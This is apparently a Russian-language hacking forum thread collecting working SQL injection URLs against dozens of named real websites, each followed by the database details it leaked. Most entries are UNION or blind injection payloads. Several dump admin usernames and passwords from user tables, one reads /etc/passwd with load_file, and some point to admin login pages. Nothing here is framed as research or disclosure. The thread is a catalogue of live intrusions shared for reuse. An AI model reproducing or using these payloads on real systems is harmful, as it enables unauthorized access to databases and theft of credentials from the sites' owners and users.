SQL Инъекции

http://www.daily-rent.ro/details.php?lang=en&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11/*



Database Version: 5.0.24a
Database name: daily_rent
User name: mihai-mir@localhost
Os: slackware-linux-gnu

 

_http://www.fcdenderdetime.be/news.php?id=-4+union+select+1,2,version(),4,5--

5.0.32-Debian_7etch11-log

Code:

http://www.netfestival.be/pages/news.php?id=-7+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

netfestinetfst:[email protected]:4.0.25-standard-log

Code:

http://www.abyssplongee.be/news.php?cid=26&id=-16+union+select+1,unhex(hex(group_concat(table_name+separator+0x0b))),3,4+from+information_schema.tables--

_http://www.hotel-ste-cecile.be/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8--

 

http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x6f696c5f7573657273
MySQL 5.0.26-log
oil_users::
id:name:,pass:type:session
http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass,type,session),6,7+from+oil_users
выводит все строки сразу

 

99px.ru - мир аватарок))) TC=20
http://99px.ru/avatar/?pid=13031/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13/*

version - 4.1.22
database - px99ru
user - px99ru@localhost
os - portbld-freebsd6.3

 

http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e
admin::id:fullname:username:,password:level:useremail
MySQL 5.0.75
http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,username,0x3a,password,0x3a,useremail,0x3a,level),3,4+from+admin

 

http://www.rohouse.com/details.php?id=964+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+LIMIT+1,1--



Database Version: 5.0.77-log
Database name: rohouse_com
User name: pinatubo@localhost
Os: redhat-linux-gnu

 

разработки и дизайн сайтов - ТС=20

Blind SQL -

Code:

http://rireg.net/index.php?page=procjects&show=35/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)

version - 5.0.45

 

Решил вспомнить, как это делается..

я хз, как там пароли зашифрованы.

UPD, офигеть, пол-второго ночи..

 

Code:

http://skytexalliance.com/index.php?id=15&p=1&tid=1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())

4.0.27-max-log:db171625947:[email protected]

Code:

http://www.ac-psych.org/index.php?id=1+union+select+concat_ws(0x3a,version(),database(),user())

5.0.33-log:acpsych_ac-psych:[email protected]

Code:

http://www.imperian.com/players.php?search=deathlog&day=1+and+(substring(version(),1,1))=4

version() - 4.1.20-log

 

http://mat.fobo.ru/show.php?show=-1234'+union+select+1,concat_ws(0x3a,user(),database(),version(),@@basedir)+--+
User:fobomat@localhost
Database:fobomat
Version: 5.0.51a-19-log
BaseDir: /usr/

 

Versiya: 5.0.67-log

User: [email protected]

Database: adminclt_testsite

OS: unknown-freebsd6.2

Admin table: Admin_User

 

5.0.81-community-log : jocurius_garrone@localhost
http://www.poze.name/poze.php?id_categ=-100+union+select+concat_ws(0x203a20,version(),user())--

5.0.18 : root@localhost : localhost : root : Y
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4,5,6,7,8,9+from+mysql.user--
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9

 

http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,column_name),3,4+from+information_schema.columns+where+table_name=0x427573546f7055736572
BusTopUser::ID:UserName:UserPass
http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,ID,0x3a,UserName,0x3a,UserPass),3,4+from+BusTopUser
MySQL 5.0.45
admin panel: http://www.let-online.co.uk/admin/login.php
вывод ошибок отключен

 

Coldplay.com pr7
Официальный сайт поп/рок группы coldplay.

Code:

[COLOR=SlateGray]http://www.coldplay.com/newsdetail.php?id=547'+union+select+null,null,null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null,null+--+[/COLOR]

version | user | database | os
4.1.22-log | [email protected] | coldplay | redhat-linux-gnu

 

дуду еду

load_file ;-)

 

http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,version()),0,0,0,0+from+idesk_user--
version - 5.0.51a-24+lenny2
database - web5@localhost
user - usr_web5_2
os - debian-linux-gnu

users
http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--

 

Code:

http://rassvet.websib.ru/portret_sec.htm?cod=1+and+substring(version(),1,1)=4

version: 4.1.20
database: cinema
user: shine@localhost

Code:

http://www.knyazev.ru/index.php?mm=7&id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4--

4.1.22-standard-log:balabol_knyazev:[email protected]
Есть таблицы admins, clients

Code:

http://www.tutpricol.ru/message.php?id=9999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

4.1.25-log:tutpric5_tutpricol:tutpric5_root@localhost
есть таблица users

 

Code:

http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6

opendag@localhost:wwwopendagru:4.1.25-log

Code:

http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6%20--

root@localhostvd:5.0.27

Code:

http://www.patrulrinpoche.ru/news.php?id=-72+union+select+concat_ws(0x3a,user(),database(),version())

patrul_ru@localhostatrul_ru:5.0.27-community-nt

Code:

http://www.caen.it/nuclear/news.php?id=-160+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9%20--

mynews@localhost:CaenNews:5.0.77

Code:

http://www.phenomental.ru/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4%20--

phenomenta@localhosthenomenta_sql:4.1.22

 

Code:

http://www.erf-nimes.org/page_1.php?ID=-101+and+1=0+union+select+1,2,concat(nomutilisateur,0x3a,motpasse),4+from+utilisateur--

Code:

http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(0x3a,userUserName,userPassword,userID),3,4,5,6,7,8,9,10+from+users--

Code:

http://www.exhaus.de/index.php?siteID=2499+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8--

Code:

http://www.eamesoffice.com/vintage/spotting_detail.php?id=-92+and+1=0+union+select+1,2,3,4,5,6,7,8,concat%28username,0x3a,userpasswo 
rd%29,10,11,12,13+from+users-- 

Code:

http://www.tasfrance.com/view_newsletter.php?id=-12+and+1=0+union+select+1,2,3,4,5,6,concat(clinum,0x3a,password),8+from+password--

 

portacafe.ru

Blind SQL -

Code:

http://portacafe.ru/index.html?id=1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)j)k)l)/**/AND/**/1=1

version - 5.0.51a-24+lenny2-log